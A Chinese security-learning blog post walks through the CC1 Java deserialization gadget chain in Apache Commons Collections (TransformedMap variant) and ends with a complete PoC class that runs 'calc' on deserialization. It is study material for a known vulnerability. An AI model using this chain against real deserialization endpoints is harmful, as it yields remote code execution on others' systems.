Java安全 反序列化(3) CC1链-TransformedMap版

news2024/11/15 15:53:07

Java安全 反序列化(3) CC1链-TransformedMap版

本文尝试从CC1的挖掘思路出发,理解CC1的实现原理

文章目录

  • Java安全 反序列化(3) CC1链-TransformedMap版
  • 配置jdk版本和源代码配置
  • 前记 为什么可以利用
  • 一.CC链中的命令执行
    • 我们可以尝试一下通过InvokerTransformer.transform()执行命令
    • 在CC链接口Transformer实现类中,我们重点关注几个实现类
      • 1.ConstantTransformer实现类
      • 2.InvokeTransformer实现类
      • 3.ChainedTransformer实现类(链式,有想法吗)
    • 现在我们可以通过链式+反射调用任意命令
  • 二. CC1挖掘原理分析&Poc编写
  • 三.CC1完整利用链Poc
  • 反思总结

Commons:Apache Commons是Apache软件基金会的项目,Commons的目的是提供可重用的解决各种实际问题的Java开源代码。

Commons Collections:Java中有一个Collections包,内部封装了许多方法用来对集合进行处理,CommonsCollections则是对Collections进行了补充,完善了更多对集合处理的方法,大大提高了性能。

实验环境:存在漏洞的版本 commons-collections3.1-3.2.1 jdk 8u71之后已修复不可利⽤

默认情况看不到AnnotationInvocationHandler类的源码,是因为jdk中没有sun包下的源码,需要手动下载该版本的openjdk源码

jdk版本及sun源码下载链接:https://pan.baidu.com/s/1JWjHsQpyhFt_KpPnt4aiwg?pwd=8888
提取码:8888

配置jdk版本和源代码配置

1.解压 jdk1.8.0_65.zip

2.解压jdk8-sun-source.zip 中class.rar中的sun源码

image-20240321192340776

3.替换 jdk1.8.0_65/src/中的sun文件夹

4.idea中添加源代码

image-20240321192614244

可以看到rt.jar包中任意源代码(而不是.class反编译文件),就是成功了

image-20240321192756947

访问 https://mvnrepository.com/artifact/commons-collections/commons-collections/3.2.1

⾸先在设置在pom.xml环境

  <dependencies>
        <dependency>
            <groupId>commons-collections</groupId>
            <artifactId>commons-collections</artifactId>
            <version>3.2.1</version>
        </dependency>
    </dependencies>

安装commons-collections成功后,环境配置结束

现在正式学习Java反序列化 CC链

前记 为什么可以利用

Apache Commons Collections中有⼀个特殊的接口,其中有⼀个实现该接口的类可以通过调用 Java的反射机制来调用任意函数,叫做InvokerTransformer,它可通过反射调用类中的方法,从而通过一连串的调用而造成命令执行,这条链便叫做Commons Collections链(简称cc链)。

一.CC链中的命令执行

我们的最终的目的是利用CC链来进行RCE

一般执行命令 Runtime.getRuntime().exec("calc");

如此简单简洁,但是为什么我们不直接利用了?

image-20240321141339891

因为我们最终要通过反序类化执行任意命令 但是Runtime没有实现Serializable接口,不可以被序列化

image-20240321141444044

这个过程中不可序列化

所以我们可以通过反射调用来进行反序列化

image-20240321141640022

Class实现了Serialiable接口 可以实现序列化

 Class Runtime = Class.forName("java.lang.Runtime");
        Method getRuntime = Runtime.getMethod("getRuntime");
        Runtime runtime =(Runtime) getRuntime.invoke(null, null);
        Method exec = Runtime.getMethod("exec", String.class);
        exec.invoke(runtime, "calc");

image-20240321142217189可以通过反射执行任意命令

在上一篇文章中我们探究了 InvokerTransformer().transform()方法可以通过类似反射调用(invoke)任意函数

image-20240321142507883

我们可以尝试一下通过InvokerTransformer.transform()执行命令

InvokeTransformer构造函数接受三个参数

image-20240321142802109

  1. 1.String 函数名 exec
  2. Class[] 参数类型 String.class
  3. Object[] 具体参数值 calc

image-20240321142932400

接受对象,对对象执行函数

        Runtime r=Runtime.getRuntime();
        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(r);

仍然可以执行系统命令

image-20240321143305158

在CC链接口Transformer实现类中,我们重点关注几个实现类

image-20240321143855730

1.ConstantTransformer实现类

image-20240321144237874

注意,和transform传入的Object input的对象无关,仅仅返回构造函数Object constantToReturn 的对象(这一点很重要,后面会应用)

2.InvokeTransformer实现类

前面探究过,通过反射调用任意的函数

相当于最后加了一个invoke方法调用

3.ChainedTransformer实现类(链式,有想法吗)

上篇文章具体调试过跟踪过ChainedTransformer的实现

image-20240321145937494

构造函数接受Transformer[] 数组进行赋值

image-20240321144628258

我们可以简单理解为一个**迭代器 **的 链式的调用

后一个对象.transform(前一个对象的.transform方法返回的对象)

通过这个ChainTransformer实现类可以实现(一节更比三节强的观念)

通过ChainTransformer.transform可以把传入Transformer[]一一调用transform方法,而且实现了 对象的传递

现在我们可以通过链式+反射调用任意命令

        Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})

        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
        chainedTransformer.transform("aaa");

注意一点chainedTransformer.transform("aaa");aaa可以替换为任意值

先调用 ConstantTransformer.transform方法覆盖了传入的"aaa"返回Runtime.class对象(和transform传入的Object input的对象无关,仅仅返回构造函数Object constantToReturn 的对象,回顾一下前面)

二. CC1挖掘原理分析&Poc编写

现在我们开始分析一下CC1是如何被发现和利用的,重点在于学习前人发现的思路

时刻记住我们的目的

这里我们先利用 单个InvokerTransformer

 Runtime r=Runtime.getRuntime();
        InvokerTransformer invokerTransformer=(InvokerTransformer) new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});

走一遍流程

我们要利用transform执行任意命令

可以查看什么地方应用了transform (这里偏向测试map)

因为Map作为键值对的映射关系可以包含任意类

image-20240321172831230

可以利用的有DefaultedMap,LazyMap,TransformedMap

这里我们探究一下TransformedMap,其他下篇文章写

在TransformedMap中的protected方法(代表仅能被自身调用)checkSetValue传入

image-20240321173045476

我们希望valueTransformer是Invocationformer对象 ,传入的Object value是Runtime对象

image-20240321173524676

构造函数进行传值,但是是protected仅能被自身调用,向上寻找

image-20240321173648507

发现decorate的public 静态方法 可以返回 调用 构造方法

参数接受(Map map, Transformer keyTransformer, Transformer valueTransformer)

这里和keyTransformer 关系不大,可以设为空

        Runtime r=Runtime.getRuntime();
        InvokerTransformer invokerTransformer=(InvokerTransformer) new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
        HashMap<Object,Object> hashmap=new HashMap<>();
        hashmap.put("key","value");
        TransformedMap.decorate(hashmap,null,invokerTransformer);

image-20240321194103688

等价于InvokerTransformer.transform()

现在控制checkSetValue(Object value)传入的值和调用checkSetValue(Object value)

查找用法

image-20240321174418115

可以发现在AbstractInput中的镶嵌类MapEntry调用了checkSetValue方法

而AbstractInput恰好又是TransformedMap的父类

image-20240321174636544

这里MapEntry类继承自AbstractMapEntryDecorator而AbstractMapEntryDecorator实现了Map.Entry的接口

image-20240321174928785

我们可以通过遍历TransformedMap的Entry实现调用setValue方法

原因:因为如果我们遍历TransformedMap的Entry调用setValue,子类继承了父类的public方法(setValue),而且实现了对Map.Entry方法的重写,可以实现调用setValue方法

调用的便是它的父类AbstractInputCheckedMapDecorator类重写的setValue方法,便会触发 checkSetValue方法,从而触发cc链1

因此编写payload

        Runtime r=Runtime.getRuntime();
        InvokerTransformer invokerTransformer=(InvokerTransformer) new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
        HashMap<Object,Object> hashmap=new HashMap<>();
        hashmap.put("key","value");
        Map<Object,Object> transformedMap =TransformedMap.decorate(hashmap,null,invokerTransformer);
        for(Map.Entry entry:transformedMap.entrySet()){
            entry.setValue(r);

        }

传入的值是Runtime对象 等价实现InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transformer(Runtime.class)

但是我们如何实现在readObject的时候调用setValue方法

经过寻找我们发现 AnnotationInvocationHandler

image-20240321193210784

1.重写了readobject

2.调用了memberValue.setValue()

而恰好我们可以控制memberValues的值

image-20240321193501905

这不是妥妥的入口类吗

这里接受两个参数Class<? extends Annotation> type, Map<String, Object> memberValues

Annotation是Java的注解,比如@Override重写等

但是我们只能 用反射操作入口类

image-20240321193659400

因为这里没有修饰词,默认是default 只能通过在包内访问

分析一下readobject类

private void readObject(java.io.ObjectInputStream s)
    throws java.io.IOException, ClassNotFoundException {
    s.defaultReadObject();


    // Check to make sure that types have not evolved incompatibly

    AnnotationType annotationType = null;
    try {
        annotationType = AnnotationType.getInstance(type);
    } catch(IllegalArgumentException e) {
        // Class is no longer an annotation type; time to punch out
        throw new java.io.InvalidObjectException("Non-annotation type in annotation serial stream");
    }

    Map<String, Class<?>> memberTypes = annotationType.memberTypes();


    // If there are annotation members without values, that
    // situation is handled by the invoke method.
    for (Map.Entry<String, Object> memberValue : memberValues.entrySet()) {
        String name = memberValue.getKey();
        Class<?> memberType = memberTypes.get(name);
        if (memberType != null) {  // i.e. member still exists
            Object value = memberValue.getValue();
            if (!(memberType.isInstance(value) ||
                  value instanceof ExceptionProxy)) {
                memberValue.setValue(
                    new AnnotationTypeMismatchExceptionProxy(
                        value.getClass() + "[" + value + "]").setMember(
                            annotationType.members().get(name)));
            }
        }
    }
}

想要走到memberValue.setValue需要走过两个判断

image-20240321194318106

在 遍历memberValues.entrySet()的过程中

 String name = memberValue.getKey();//获取Map键值
            Class<?> memberType = memberTypes.get(name);//获取Java注解的类型
            if (memberType != null) {  
                Object value = memberValue.getValue();

Map<String, Class<?>> memberTypes = annotationType.memberTypes();

获取了memeberValue键的值作为name,在注解中寻找等于注解的name的值

判断不为空即可

我们需要获取注解中存在键值对的注解,这里我们可以用 @Target

image-20240321201203011

@Target 存在value的键 为了memberType 保证不为空,所以将hashmap.put("value","value");设为value

保证Class<?> memberType = memberTypes.get(name);//获取Java注解的类型可以保证memberTypes.get(name)可以获取到值

第二个if判断一定是可以通过的 member一定是存在的

image-20240321202019584

这里setValue的值不可控,但是对我们利用完全不影响

虽然这里的setValue方法带一个初始值,但我们ConstantTransformer类的transform方法,不受参数影响,构造方法传入什么,就原封不动返回什么

第三次重复了

和传入setValue的值没有关系

我们将InvokerTransformer替换为ChainTransformer

尝试通过反射建构AnnotationInvocationHandler 类

image-20240321203304350

接受Class<? extends Annotation> type, Map<String, Object> memberValues

通过反射创建AnnotationInvocationHandler实例

       Class annotation = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationDeclaredConstructor = annotation.getDeclaredConstructor(Class.class,Map.class);
        annotationDeclaredConstructor.setAccessible(true);
        Object annotationInstantce = annotationDeclaredConstructor.newInstance(Target.class,transformedMap);

对annotationInstantce进行序列化后反序列化后执行命令

image-20240321204608342

成功手写CC1链的Poc

三.CC1完整利用链Poc

import org.apache.commons.collections.Transformer;
import org.apache.commons.collections.functors.ChainedTransformer;
import org.apache.commons.collections.functors.ConstantTransformer;
import org.apache.commons.collections.functors.InvokerTransformer;
import org.apache.commons.collections.map.TransformedMap;
import sun.instrument.TransformerManager;

import java.io.*;
import java.lang.annotation.Target;
import java.lang.reflect.Constructor;
import java.lang.reflect.InvocationTargetException;
import java.lang.reflect.Method;
import java.util.HashMap;
import java.util.Map;

public class CC1 {
    public static void main(String[] args) throws IOException, ClassNotFoundException, NoSuchMethodException, InvocationTargetException, IllegalAccessException, InstantiationException {
        //Runtime.getRuntime().exec("calc");
//        Class Runtime = Class.forName("java.lang.Runtime");
//        Method getRuntime = Runtime.getMethod("getRuntime");
//        Runtime runtime =(Runtime) getRuntime.invoke(null, null);
//        Method exec = Runtime.getMethod("exec", String.class);
//        exec.invoke(runtime, "calc");
//        Runtime r=Runtime.getRuntime();
//        new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"}).transform(r);
        Transformer[] transformers=new Transformer[]{
            new ConstantTransformer(Runtime.class),
            new InvokerTransformer("getMethod",new Class[]{String.class,Class[].class},new Object[]{"getRuntime",new Class[0]}),
                new InvokerTransformer("invoke",new Class[]{Object.class,Object[].class},new Object[]{null,new Object[0]}),
                new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"})

        };
        ChainedTransformer chainedTransformer=new ChainedTransformer(transformers);
//        ChainedTransformer chainedTransformer =(ChainedTransformer) chainedTransformer.transform("aaa");
//        Runtime r=Runtime.getRuntime();
//        InvokerTransformer invokerTransformer=(InvokerTransformer) new InvokerTransformer("exec",new Class[]{String.class},new Object[]{"calc"});
        HashMap<Object,Object> hashmap=new HashMap<>();
        hashmap.put("value","value");
        Map<Object,Object> transformedMap =TransformedMap.decorate(hashmap,null,chainedTransformer);
//        for(Map.Entry entry:transformedMap.entrySet()){
//            entry.setValue(r);
       Class annotation = Class.forName("sun.reflect.annotation.AnnotationInvocationHandler");
        Constructor annotationDeclaredConstructor = annotation.getDeclaredConstructor(Class.class,Map.class);
        annotationDeclaredConstructor.setAccessible(true);
        Object annotationInstantce = annotationDeclaredConstructor.newInstance(Target.class,transformedMap);
        serialize(annotationInstantce);
        unserialize();


    }
    public static void serialize(Object obj) throws IOException {
        ObjectOutputStream oos = new ObjectOutputStream(new
                FileOutputStream("ser.bin"));
        oos.writeObject(obj);
        oos.close();
    }
    public static void unserialize() throws IOException, ClassNotFoundException
    {
        ObjectInputStream ois = new ObjectInputStream(new
                FileInputStream("ser.bin"));
        ois.readObject();
        ois.close();
    }


    }


以后遇到其他类似题,就可以参考Poc了

反思总结

核心概念

  1. 入口类必须重写readObject
  2. 通过不同类的同名方法进行跳转连接

下一篇我们从LazyMap出发实现RCE

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/1534430.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

分布式异步任务框架celery

Celery介绍 github地址&#xff1a;GitHub - celery/celery: Distributed Task Queue (development branch) 文档地址&#xff1a;Celery - Distributed Task Queue — Celery 5.3.6 documentation 1.1 Celery是什么 celery时一个灵活且可靠的处理大量消息的分布式系统&…

数据库关系运算理论:传统的集合运算概念解析

✨✨ 欢迎大家来访Srlua的博文&#xff08;づ&#xffe3;3&#xffe3;&#xff09;づ╭❤&#xff5e;✨✨ &#x1f31f;&#x1f31f; 欢迎各位亲爱的读者&#xff0c;感谢你们抽出宝贵的时间来阅读我的文章。 我是Srlua小谢&#xff0c;在这里我会分享我的知识和经验。&am…

如何在wps的excel表格里面使用动态gif图

1、新建excel表格&#xff0c;粘贴gif图到表格里面&#xff0c;鼠标右键选择超链接。 找到源文件&#xff0c; 鼠标放到图片上的时候&#xff0c;待有个小手图标&#xff0c;双击鼠标可以放大看到动态gif图。 这种方式需要确保链接的原始文件位置和名称不能变化&#xff01;&a…

网工内推 | 云计算工程师,HCIE认证优先,最高18k*14薪

01 杭州中港科技有限公司 招聘岗位&#xff1a;云计算工程师 职责描述&#xff1a; 1、承担云计算相关工程交付、业务上云及售前测试&#xff0c;从事虚拟化、桌面云、存储、服务器、数据中心、大数据、相关产品的工程项目交付或协助项目交付。 2、承担云计算维护工程师职责&…

深入理解Mysql索引底层原理(看这一篇文章就够了)

目录 前言 1、Mysql 索引底层数据结构选型 1.1 哈希表&#xff08;Hash&#xff09; 1.2 二叉查找树(BST) 1.3 AVL 树和红黑树 1.4 B 树 1.5 B树 2、Innodb 引擎和 Myisam 引擎的实现 2.1 MyISAM 引擎的底层实现&#xff08;非聚集索引方式&#xff09; 2.2 Innodb 引…

L4 级自动驾驶汽车发展综述

摘要:为了减小交通事故概率、降低运营成本、提高运营效率,实现安全、环保的出行,自动驾驶 技术的发展已成为大势所趋,而搭配有L4 级自动驾驶系统的车辆是将车辆驾驶全部交给系统。据此,介绍了自动驾驶汽车的主流技术解决方案;分析了国内外L4 级自动驾驶汽车的已发布车型、…

Python 安装目录及虚拟环境详解

Python 安装目录 原文链接&#xff1a;https://blog.csdn.net/xhyue_0209/article/details/106661191 Python 虚拟环境 python 虚拟环境图解 python 虚拟环境配置与详情 原文链接&#xff1a;https://www.cnblogs.com/hhaostudy/p/17321646.html

C语言易错知识点:二级指针、数组指针、函数指针

指针在C语言中非常关键&#xff0c;除开一些常见的指针用法&#xff0c;还有一些可能会比较生疏&#xff0c;但有时却也必不可少&#xff0c;本文章整理了一些易错知识点&#xff0c;希望能有所帮助&#xff01; 1.二级指针&#xff1a; parr是一个指针数组&#xff0c;其中每…

std::shared_ptr与std::make_unique在类函数中的使用

在最近学习cartographer算法的时候&#xff0c;发现源码中大量的使用了std::shared_ptr与std::make_unique&#xff0c;对于这些东西之前不是很了解&#xff0c;为了更好的理解源代码&#xff0c;因此简单学习了一下这块内容的使用&#xff0c;在这里简单记个笔记。 std::shar…

【热门话题】深入浅出:npm常用命令详解与实践

&#x1f308;个人主页: 鑫宝Code &#x1f525;热门专栏: 闲话杂谈&#xff5c; 炫酷HTML | JavaScript基础 ​&#x1f4ab;个人格言: "如无必要&#xff0c;勿增实体" 文章目录 标题&#xff1a;深入浅出&#xff1a;npm常用命令详解与实践引言一、npm基本概…

打流仪/网络测试仪这个市场还能怎么卷?

#喝了点&#xff0c;码点字# 以下为个人观点&#xff0c;看看就好&#xff0c;如有冒犯&#xff0c;私信删稿 都有哪些厂商在做打流仪/网络测试仪 -洋品牌&#xff1a;思博伦/Viavi-Spirent&#xff0c;是德/Keysight-Ixia&#xff0c;信雅纳/Lecroy-Xena&#xff0c; -国产…

睿尔曼超轻量仿人机械臂之-灵巧手动作编写及程序调用

一、灵巧手动作编写 1.连接设备 2. 运动控制 3. 参数设置 4 动作库使用 本软件可以设置灵巧手内部第 1-第 13 套动作序列数据&#xff0c;每套动作序列最多能有 8 步 分解动作&#xff0c;每一步分解动作的手指角度、运动速度、力度以及等待时间都可以单独设置。 步骤数&…

QT_day2:2024/3/21

作业1&#xff1a;使用QT完成一个登录界面 要求&#xff1a; 1. 需要使用Ui界面文件进行界面设计 2. ui界面上的组件相关设置&#xff0c;通过代码实现 3. 需要添加适当的动图 源代码&#xff1a; #include "widget.h" #include "ui_widget.h"Widget…

力扣由浅至深 每日一题.06 删除有序数组中的重复项

希望我们都能对抗生活的苦难&#xff0c;在乌云周围突破阴霾积极的生活 —— 24.3.16 删除有序数组中的重复项 提示 给你一个 非严格递增排列 的数组 nums &#xff0c;请你 原地 删除重复出现的元素&#xff0c;使每个元素 只出现一次 &#xff0c;返回删除后数组的新长度。元…

贝尔曼方程【Bellman Equation】

强化学习笔记 主要基于b站西湖大学赵世钰老师的【强化学习的数学原理】课程&#xff0c;个人觉得赵老师的课件深入浅出&#xff0c;很适合入门. 第一章 强化学习基本概念 第二章 贝尔曼方程 文章目录 强化学习笔记一、状态值函数贝尔曼方程二、贝尔曼方程的向量形式三、动作值…

Windows系统部署GoLand结合内网穿透实现SSH远程Linux服务器开发调试

&#x1f308;个人主页: Aileen_0v0 &#x1f525;热门专栏: 华为鸿蒙系统学习|计算机网络|数据结构与算法|MySQL| ​&#x1f4ab;个人格言:“没有罗马,那就自己创造罗马~” #mermaid-svg-HIOuHATnug3qMHzx {font-family:"trebuchet ms",verdana,arial,sans-serif;f…

【Vue3遇见的问题】创建vue3的项目使用vscode打开后项目的app.vue里面存在爆红

出现的问题 直接上上问题:问题的图片如下: 解决方法 解决效果 补充 因为vetur的插件禁用了 所以需要一个新插件来 这里发现的官网推荐的插件 也就是volar 他两是一样的

嵌入式软件面试-linux-中高级问题

Linux系统启动过程&#xff1a; BIOS自检并加载引导程序。引导程序&#xff08;如GRUB&#xff09;加载Linux内核到内存。内核初始化硬件&#xff0c;加载驱动&#xff0c;建立内存管理。加载init进程&#xff08;PID为1&#xff09;&#xff0c;通常是systemd或SysVinit。init…

Redis监控工具

Redis 是一种 NoSQL 数据库系统&#xff0c;以其速度、性能和灵活的数据结构而闻名。Redis 在许多领域都表现出色&#xff0c;包括缓存、会话管理、游戏、排行榜、实时分析、地理空间、叫车、聊天/消息、媒体流和发布/订阅应用程序。Redis 数据集完全存储在内存中&#xff0c;这…

深度学习——数据预处理

一、数据预处理 为了能用深度学习来解决现实世界的问题&#xff0c;我们经常从预处理原始数据开始&#xff0c; 而不是从那些准备好的张量格式数据开始。 在Python中常用的数据分析工具中&#xff0c;我们通常使用pandas软件包。 像庞大的Python生态系统中的许多其他扩展包一样…